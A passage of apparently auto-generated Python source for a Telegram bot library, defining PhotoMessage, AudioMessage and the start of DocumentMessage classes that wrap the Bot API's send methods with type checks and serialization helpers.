:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
def __init__(self, photo, receiver=None, reply_id=DEFAULT_MESSAGE_ID, caption=None, parse_mode=None, caption_entities=None, disable_notification=None, allow_sending_without_reply=None, reply_markup=None):
"""
Use this method to send photos. On success, the sent Message is returned.
https://core.telegram.org/bots/api#sendphoto
Parameters:
:param photo: Photo to send. Pass a file_id as String to send a photo that exists on the Telegram servers (recommended), pass an HTTP URL as a String for Telegram to get a photo from the Internet, or upload a new photo using multipart/form-data. The photo must be at most 10 MB in size. The photo's width and height must not exceed 10000 in total. Width and height ratio must be at most 20. More info on Sending Files »
:type photo: pytgbot.api_types.sendable.files.InputFile | str|unicode
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param caption: Photo caption (may also be used when resending photos by file_id), 0-1024 characters after entities parsing
:type caption: str|unicode
:param parse_mode: Mode for parsing entities in the photo caption. See formatting options for more details.
:type parse_mode: str|unicode
:param caption_entities: A JSON-serialized list of special entities that appear in the caption, which can be specified instead of parse_mode
:type caption_entities: list of pytgbot.api_types.receivable.media.MessageEntity
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
super(PhotoMessage, self).__init__()
from pytgbot.api_types.receivable.media import MessageEntity
from pytgbot.api_types.sendable.files import InputFile
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
assert_type_or_raise(photo, InputFile, unicode_type, parameter_name="photo")
self.photo = photo
assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
self.receiver = receiver
assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
self.reply_id = reply_id
assert_type_or_raise(caption, None, unicode_type, parameter_name="caption")
self.caption = caption
assert_type_or_raise(parse_mode, None, unicode_type, parameter_name="parse_mode")
self.parse_mode = parse_mode
assert_type_or_raise(caption_entities, None, list, parameter_name="caption_entities")
self.caption_entities = caption_entities
assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
self.disable_notification = disable_notification
assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
self.allow_sending_without_reply = allow_sending_without_reply
assert_type_or_raise(reply_markup, None, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply, parameter_name="reply_markup")
self.reply_markup = reply_markup
# custom variable for message chaining
self._next_msg = None
# end def __init__
def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
"""
Send the message via pytgbot.
:param sender: The bot instance to send with.
:type sender: pytgbot.bot.Bot
:param ignore_reply: If we should not include the the `reply_to` parameter, because that already failed.
:type ignore_reply: bool
:rtype: PytgbotApiMessage
"""
return sender.send_photo(
photo=self.photo,
chat_id=self.receiver,
reply_to_message_id=self.reply_id,
caption=self.caption,
parse_mode=self.parse_mode,
caption_entities=self.caption_entities,
disable_notification=self.disable_notification,
allow_sending_without_reply=self.allow_sending_without_reply,
reply_markup=self.reply_markup,
)
# end def send
def to_array(self):
"""
Serializes this PhotoMessage to a dictionary.
:return: dictionary representation of this object.
:rtype: dict
"""
from pytgbot.api_types.receivable.media import MessageEntity
from pytgbot.api_types.sendable.files import InputFile
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
array = super(PhotoMessage, self).to_array()
if isinstance(self.photo, InputFile):
array['photo'] = self.photo.to_array() # type InputFile
elif isinstance(self.photo, str):
array['photo'] = u(self.photo) # py2: type unicode, py3: type str
else:
raise TypeError('Unknown type, must be one of InputFile, str.')
# end if
if isinstance(self.receiver, str):
array['chat_id'] = u(self.receiver) # py2: type unicode, py3: type str
elif isinstance(self.receiver, int):
array['chat_id'] = int(self.receiver) # type int
else:
raise TypeError('Unknown type, must be one of str, int.')
# end if
if isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id) # type DEFAULT_MESSAGE_ID
elif isinstance(self.reply_id, int):
array['reply_to_message_id'] = int(self.reply_id) # type int
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int.')
# end if
array['caption'] = u(self.caption) # py2: type unicode, py3: type str
array['parse_mode'] = u(self.parse_mode) # py2: type unicode, py3: type str
array['caption_entities'] = PytgbotApiBot._as_array(self.caption_entities) # type list of MessageEntity
array['disable_notification'] = bool(self.disable_notification) # type bool
array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply) # type bool
if isinstance(self.reply_markup, InlineKeyboardMarkup):
array['reply_markup'] = self.reply_markup.to_array() # type InlineKeyboardMarkup
elif isinstance(self.reply_markup, ReplyKeyboardMarkup):
array['reply_markup'] = self.reply_markup.to_array() # type ReplyKeyboardMarkup
elif isinstance(self.reply_markup, ReplyKeyboardRemove):
array['reply_markup'] = self.reply_markup.to_array() # type ReplyKeyboardRemove
elif isinstance(self.reply_markup, ForceReply):
array['reply_markup'] = self.reply_markup.to_array() # type ForceReply
else:
raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply.')
# end if
return array
# end def to_array
@staticmethod
def validate_array(array):
"""
Builds a new array with valid values for the PhotoMessage constructor.
:return: new array with valid values
:rtype: dict
"""
assert_type_or_raise(array, dict, parameter_name="array")
from pytgbot.api_types.receivable.media import MessageEntity
from pytgbot.api_types.sendable.files import InputFile
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
data = super(PhotoMessage, PhotoMessage).validate_array(array)
if isinstance(array.get('photo'), InputFile):
data['photo'] = InputFile.from_array(array.get('photo'))
elif isinstance(array.get('photo'), str):
data['photo'] = u(array.get('photo'))
else:
raise TypeError('Unknown type, must be one of InputFile, str.')
# end if
if array.get('chat_id') is None:
data['receiver'] = None
elif isinstance(array.get('chat_id'), str):
data['receiver'] = u(array.get('chat_id'))
elif isinstance(array.get('chat_id'), int):
data['receiver'] = int(array.get('chat_id'))
else:
raise TypeError('Unknown type, must be one of str, int or None.')
# end if
if array.get('reply_to_message_id') is None:
data['reply_id'] = None
elif isinstance(array.get('reply_to_message_id'), DEFAULT_MESSAGE_ID):
data['reply_id'] = DEFAULT_MESSAGE_ID
elif isinstance(array.get('reply_to_message_id'), int):
data['reply_id'] = int(array.get('reply_to_message_id'))
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
# end if
data['caption'] = u(array.get('caption')) if array.get('caption') is not None else None
data['parse_mode'] = u(array.get('parse_mode')) if array.get('parse_mode') is not None else None
data['caption_entities'] = MessageEntity.from_array_list(array.get('caption_entities'), list_level=1) if array.get('caption_entities') is not None else None
data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None
if array.get('reply_markup') is None:
data['reply_markup'] = None
elif isinstance(array.get('reply_markup'), InlineKeyboardMarkup):
data['reply_markup'] = InlineKeyboardMarkup.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ReplyKeyboardMarkup):
data['reply_markup'] = ReplyKeyboardMarkup.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ReplyKeyboardRemove):
data['reply_markup'] = ReplyKeyboardRemove.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ForceReply):
data['reply_markup'] = ForceReply.from_array(array.get('reply_markup'))
else:
raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply or None.')
# end if
return data
# end def validate_array
@staticmethod
def from_array(array):
"""
Deserialize a new PhotoMessage from a given dictionary.
:return: new PhotoMessage instance.
:rtype: PhotoMessage
"""
if not array: # None or {}
return None
# end if
data = PhotoMessage.validate_array(array)
return PhotoMessage(**data)
# end def from_array
def __str__(self):
"""
Implements `str(photomessage_instance)`
"""
return "PhotoMessage(photo={self.photo!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, caption={self.caption!r}, parse_mode={self.parse_mode!r}, caption_entities={self.caption_entities!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
# end def __str__
def __repr__(self):
"""
Implements `repr(photomessage_instance)`
"""
return "PhotoMessage(photo={self.photo!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, caption={self.caption!r}, parse_mode={self.parse_mode!r}, caption_entities={self.caption_entities!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
# end def __repr__
def __contains__(self, key):
"""
Implements `"key" in photomessage_instance`
"""
return (
key in ["photo", "receiver", "reply_id", "caption", "parse_mode", "caption_entities", "disable_notification", "allow_sending_without_reply", "reply_markup"]
and hasattr(self, key)
and bool(getattr(self, key, None))
)
# end def __contains__
# end class PhotoMessage
class AudioMessage(ReturnableMessageBase):
"""
Use this method to send audio files, if you want Telegram clients to display them in the music player. Your audio must be in the .MP3 or .M4A format. On success, the sent Message is returned. Bots can currently send audio files of up to 50 MB in size, this limit may be changed in the future.
For sending voice messages, use the sendVoice method instead.
https://core.telegram.org/bots/api#sendaudio
Parameters:
:param audio: Audio file to send. Pass a file_id as String to send an audio file that exists on the Telegram servers (recommended), pass an HTTP URL as a String for Telegram to get an audio file from the Internet, or upload a new one using multipart/form-data. More info on Sending Files »
:type audio: pytgbot.api_types.sendable.files.InputFile | str|unicode
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param caption: Audio caption, 0-1024 characters after entities parsing
:type caption: str|unicode
:param parse_mode: Mode for parsing entities in the audio caption. See formatting options for more details.
:type parse_mode: str|unicode
:param caption_entities: A JSON-serialized list of special entities that appear in the caption, which can be specified instead of parse_mode
:type caption_entities: list of pytgbot.api_types.receivable.media.MessageEntity
:param duration: Duration of the audio in seconds
:type duration: int
:param performer: Performer
:type performer: str|unicode
:param title: Track name
:type title: str|unicode
:param thumb: Thumbnail of the file sent; can be ignored if thumbnail generation for the file is supported server-side. The thumbnail should be in JPEG format and less than 200 kB in size. A thumbnail's width and height should not exceed 320. Ignored if the file is not uploaded using multipart/form-data. Thumbnails can't be reused and can be only uploaded as a new file, so you can pass "attach://<file_attach_name>" if the thumbnail was uploaded using multipart/form-data under <file_attach_name>. More info on Sending Files »
:type thumb: pytgbot.api_types.sendable.files.InputFile | str|unicode
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
def __init__(self, audio, receiver=None, reply_id=DEFAULT_MESSAGE_ID, caption=None, parse_mode=None, caption_entities=None, duration=None, performer=None, title=None, thumb=None, disable_notification=None, allow_sending_without_reply=None, reply_markup=None):
"""
Use this method to send audio files, if you want Telegram clients to display them in the music player. Your audio must be in the .MP3 or .M4A format. On success, the sent Message is returned. Bots can currently send audio files of up to 50 MB in size, this limit may be changed in the future.
For sending voice messages, use the sendVoice method instead.
https://core.telegram.org/bots/api#sendaudio
Parameters:
:param audio: Audio file to send. Pass a file_id as String to send an audio file that exists on the Telegram servers (recommended), pass an HTTP URL as a String for Telegram to get an audio file from the Internet, or upload a new one using multipart/form-data. More info on Sending Files »
:type audio: pytgbot.api_types.sendable.files.InputFile | str|unicode
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param caption: Audio caption, 0-1024 characters after entities parsing
:type caption: str|unicode
:param parse_mode: Mode for parsing entities in the audio caption. See formatting options for more details.
:type parse_mode: str|unicode
:param caption_entities: A JSON-serialized list of special entities that appear in the caption, which can be specified instead of parse_mode
:type caption_entities: list of pytgbot.api_types.receivable.media.MessageEntity
:param duration: Duration of the audio in seconds
:type duration: int
:param performer: Performer
:type performer: str|unicode
:param title: Track name
:type title: str|unicode
:param thumb: Thumbnail of the file sent; can be ignored if thumbnail generation for the file is supported server-side. The thumbnail should be in JPEG format and less than 200 kB in size. A thumbnail's width and height should not exceed 320. Ignored if the file is not uploaded using multipart/form-data. Thumbnails can't be reused and can be only uploaded as a new file, so you can pass "attach://<file_attach_name>" if the thumbnail was uploaded using multipart/form-data under <file_attach_name>. More info on Sending Files »
:type thumb: pytgbot.api_types.sendable.files.InputFile | str|unicode
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
super(AudioMessage, self).__init__()
from pytgbot.api_types.receivable.media import MessageEntity
from pytgbot.api_types.sendable.files import InputFile
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
assert_type_or_raise(audio, InputFile, unicode_type, parameter_name="audio")
self.audio = audio
assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
self.receiver = receiver
assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
self.reply_id = reply_id
assert_type_or_raise(caption, None, unicode_type, parameter_name="caption")
self.caption = caption
assert_type_or_raise(parse_mode, None, unicode_type, parameter_name="parse_mode")
self.parse_mode = parse_mode
assert_type_or_raise(caption_entities, None, list, parameter_name="caption_entities")
self.caption_entities = caption_entities
assert_type_or_raise(duration, None, int, parameter_name="duration")
self.duration = duration
assert_type_or_raise(performer, None, unicode_type, parameter_name="performer")
self.performer = performer
assert_type_or_raise(title, None, unicode_type, parameter_name="title")
self.title = title
assert_type_or_raise(thumb, None, InputFile, unicode_type, parameter_name="thumb")
self.thumb = thumb
assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
self.disable_notification = disable_notification
assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
self.allow_sending_without_reply = allow_sending_without_reply
assert_type_or_raise(reply_markup, None, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply, parameter_name="reply_markup")
self.reply_markup = reply_markup
# custom variable for message chaining
self._next_msg = None
# end def __init__
def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
"""
Send the message via pytgbot.
:param sender: The bot instance to send with.
:type sender: pytgbot.bot.Bot
:param ignore_reply: If we should not include the the `reply_to` parameter, because that already failed.
:type ignore_reply: bool
:rtype: PytgbotApiMessage
"""
return sender.send_audio(
audio=self.audio,
chat_id=self.receiver,
reply_to_message_id=self.reply_id,
caption=self.caption,
parse_mode=self.parse_mode,
caption_entities=self.caption_entities,
duration=self.duration,
performer=self.performer,
title=self.title,
thumb=self.thumb,
disable_notification=self.disable_notification,
allow_sending_without_reply=self.allow_sending_without_reply,
reply_markup=self.reply_markup,
)
# end def send
def to_array(self):
"""
Serializes this AudioMessage to a dictionary.
:return: dictionary representation of this object.
:rtype: dict
"""
from pytgbot.api_types.receivable.media import MessageEntity
from pytgbot.api_types.sendable.files import InputFile
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
array = super(AudioMessage, self).to_array()
if isinstance(self.audio, InputFile):
array['audio'] = self.audio.to_array() # type InputFile
elif isinstance(self.audio, str):
array['audio'] = u(self.audio) # py2: type unicode, py3: type str
else:
raise TypeError('Unknown type, must be one of InputFile, str.')
# end if
if isinstance(self.receiver, str):
array['chat_id'] = u(self.receiver) # py2: type unicode, py3: type str
elif isinstance(self.receiver, int):
array['chat_id'] = int(self.receiver) # type int
else:
raise TypeError('Unknown type, must be one of str, int.')
# end if
if isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id) # type DEFAULT_MESSAGE_ID
elif isinstance(self.reply_id, int):
array['reply_to_message_id'] = int(self.reply_id) # type int
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int.')
# end if
array['caption'] = u(self.caption) # py2: type unicode, py3: type str
array['parse_mode'] = u(self.parse_mode) # py2: type unicode, py3: type str
array['caption_entities'] = PytgbotApiBot._as_array(self.caption_entities) # type list of MessageEntity
array['duration'] = int(self.duration) # type int
array['performer'] = u(self.performer) # py2: type unicode, py3: type str
array['title'] = u(self.title) # py2: type unicode, py3: type str
if isinstance(self.thumb, InputFile):
array['thumb'] = self.thumb.to_array() # type InputFile
elif isinstance(self.thumb, str):
array['thumb'] = u(self.thumb) # py2: type unicode, py3: type str
else:
raise TypeError('Unknown type, must be one of InputFile, str.')
# end if
array['disable_notification'] = bool(self.disable_notification) # type bool
array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply) # type bool
if isinstance(self.reply_markup, InlineKeyboardMarkup):
array['reply_markup'] = self.reply_markup.to_array() # type InlineKeyboardMarkup
elif isinstance(self.reply_markup, ReplyKeyboardMarkup):
array['reply_markup'] = self.reply_markup.to_array() # type ReplyKeyboardMarkup
elif isinstance(self.reply_markup, ReplyKeyboardRemove):
array['reply_markup'] = self.reply_markup.to_array() # type ReplyKeyboardRemove
elif isinstance(self.reply_markup, ForceReply):
array['reply_markup'] = self.reply_markup.to_array() # type ForceReply
else:
raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply.')
# end if
return array
# end def to_array
@staticmethod
def validate_array(array):
"""
Builds a new array with valid values for the AudioMessage constructor.
:return: new array with valid values
:rtype: dict
"""
assert_type_or_raise(array, dict, parameter_name="array")
from pytgbot.api_types.receivable.media import MessageEntity
from pytgbot.api_types.sendable.files import InputFile
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
data = super(AudioMessage, AudioMessage).validate_array(array)
if isinstance(array.get('audio'), InputFile):
data['audio'] = InputFile.from_array(array.get('audio'))
elif isinstance(array.get('audio'), str):
data['audio'] = u(array.get('audio'))
else:
raise TypeError('Unknown type, must be one of InputFile, str.')
# end if
if array.get('chat_id') is None:
data['receiver'] = None
elif isinstance(array.get('chat_id'), str):
data['receiver'] = u(array.get('chat_id'))
elif isinstance(array.get('chat_id'), int):
data['receiver'] = int(array.get('chat_id'))
else:
raise TypeError('Unknown type, must be one of str, int or None.')
# end if
if array.get('reply_to_message_id') is None:
data['reply_id'] = None
elif isinstance(array.get('reply_to_message_id'), DEFAULT_MESSAGE_ID):
data['reply_id'] = DEFAULT_MESSAGE_ID
elif isinstance(array.get('reply_to_message_id'), int):
data['reply_id'] = int(array.get('reply_to_message_id'))
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
# end if
data['caption'] = u(array.get('caption')) if array.get('caption') is not None else None
data['parse_mode'] = u(array.get('parse_mode')) if array.get('parse_mode') is not None else None
data['caption_entities'] = MessageEntity.from_array_list(array.get('caption_entities'), list_level=1) if array.get('caption_entities') is not None else None
data['duration'] = int(array.get('duration')) if array.get('duration') is not None else None
data['performer'] = u(array.get('performer')) if array.get('performer') is not None else None
data['title'] = u(array.get('title')) if array.get('title') is not None else None
if array.get('thumb') is None:
data['thumb'] = None
elif isinstance(array.get('thumb'), InputFile):
data['thumb'] = InputFile.from_array(array.get('thumb'))
elif isinstance(array.get('thumb'), str):
data['thumb'] = u(array.get('thumb'))
else:
raise TypeError('Unknown type, must be one of InputFile, str or None.')
# end if
data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None
if array.get('reply_markup') is None:
data['reply_markup'] = None
elif isinstance(array.get('reply_markup'), InlineKeyboardMarkup):
data['reply_markup'] = InlineKeyboardMarkup.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ReplyKeyboardMarkup):
data['reply_markup'] = ReplyKeyboardMarkup.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ReplyKeyboardRemove):
data['reply_markup'] = ReplyKeyboardRemove.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ForceReply):
data['reply_markup'] = ForceReply.from_array(array.get('reply_markup'))
else:
raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply or None.')
# end if
return data
# end def validate_array
@staticmethod
def from_array(array):
"""
Deserialize a new AudioMessage from a given dictionary.
:return: new AudioMessage instance.
:rtype: AudioMessage
"""
if not array: # None or {}
return None
# end if
data = AudioMessage.validate_array(array)
return AudioMessage(**data)
# end def from_array
def __str__(self):
"""
Implements `str(audiomessage_instance)`
"""
return "AudioMessage(audio={self.audio!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, caption={self.caption!r}, parse_mode={self.parse_mode!r}, caption_entities={self.caption_entities!r}, duration={self.duration!r}, performer={self.performer!r}, title={self.title!r}, thumb={self.thumb!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
# end def __str__
def __repr__(self):
"""
Implements `repr(audiomessage_instance)`
"""
return "AudioMessage(audio={self.audio!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, caption={self.caption!r}, parse_mode={self.parse_mode!r}, caption_entities={self.caption_entities!r}, duration={self.duration!r}, performer={self.performer!r}, title={self.title!r}, thumb={self.thumb!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
# end def __repr__
def __contains__(self, key):
"""
Implements `"key" in audiomessage_instance`
"""
return (
key in ["audio", "receiver", "reply_id", "caption", "parse_mode", "caption_entities", "duration", "performer", "title", "thumb", "disable_notification", "allow_sending_without_reply", "reply_markup"]
and hasattr(self, key)
and bool(getattr(self, key, None))
)
# end def __contains__
# end class AudioMessage
class DocumentMessage(ReturnableMessageBase):
"""
Use this method to send general files. On success, the sent Message is returned. Bots can currently send files of any type of up to 50 MB in size, this limit may be changed in the future.
https://core.telegram.org/bots/api#senddocument
Parameters:
:param document: File to send. Pass a file_id as String to send a file that exists on the Telegram servers (recommended), pass an HTTP URL as a String for Telegram to get a file from the Internet, or upload a new one using multipart/form-data. More info on Sending Files »
:type document: pytgbot.api_types.sendable.files.InputFile | str|unicode
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param thumb: Thumbnail of the file sent; can be ignored if thumbnail generation for the file is supported server-side. The thumbnail should be in JPEG format and less than 200 kB in size. A thumbnail's width and height should not exceed 320. Ignored if the file is not uploaded using multipart/form-data. Thumbnails can't be reused and can be only uploaded as a new file, so you can pass "attach://<file_attach_name>" if the thumbnail was uploaded using multipart/form-data under <file_attach_name>. More info on Sending Files »
:type thumb: pytgbot.api_types.sendable.files.InputFile | str|unicode
:param caption: Document caption (may also be used when resending documents by file_id), 0-1024 characters after entities parsing
:type caption: str|unicode
:param parse_mode: Mode for parsing entities in the document caption. See formatting options for more details.
:type parse_mode: str|unicode
:param caption_entities: A JSON-serialized list of special entities that appear in the caption, which can be specified instead of parse_mode
:type caption_entities: list of pytgbot.api_types.receivable.media.MessageEntity
:param disable_content_type_detection: Disables automatic server-side content type detection for files uploaded using multipart/form-data
:type disable_content_type_detection: bool
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
def __init__(self, document, receiver=None, reply_id=DEFAULT_MESSAGE_ID, thumb=None, caption=None, parse_mode=None, caption_entities=None, disable_content_type_detection=None, disable_notification=None, allow_sending_without_reply=None, reply_markup=None):
"""
Use this method to send general files. On success, the sent Message is returned. Bots can currently send files of any type of up to 50 MB in size, this limit may be changed in the future.
https://core.telegram.org/bots/api#senddocument
Parameters:
:param document: File to send. Pass a file_id as String to send a file that exists on the Telegram servers (recommended), pass an HTTP URL as a String for Telegram to get a file from the Internet, or upload a new one using multipart/form-data. More info on Sending Files »
:type document: pytgbot.api_types.sendable.files.InputFile | str|unicode
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param thumb: Thumbnail of the file sent; can be ignored if thumbnail generation for the file is supported server-side. The thumbnail should be in JPEG format and less than 200 kB in size. A thumbnail's width and height should not exceed 320. Ignored if the file is not uploaded using multipart/form-data. Thumbnails can't be reused and can be only uploaded as a new file, so you can pass "attach://<file_attach_name>" if the thumbnail was uploaded using multipart/form-data under <file_attach_name>. More info on Sending Files »
:type thumb: pytgbot.api_types.sendable.files.InputFile | str|unicode
:param caption: Document caption (may also be used when resending documents by file_id), 0-1024 characters after entities parsing
:type caption: str|unicode
:param parse_mode: Mode for parsing entities in the document caption. See formatting options for more details.
:type parse_mode: str|unicode
:param caption_entities: A JSON-serialized list of special entities that appear in the caption, which can be specified instead of parse_mode
:type caption_entities: list of pytgbot.api_types.receivable.media.MessageEntity
:param disable_content_type_detection: Disables automatic server-side content type detection for files uploaded using multipart/form-data
:type disable_content_type_detection: bool
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
super(DocumentMessage, self).__init__()
from pytgbot.api_types.receivable.media import MessageEntity
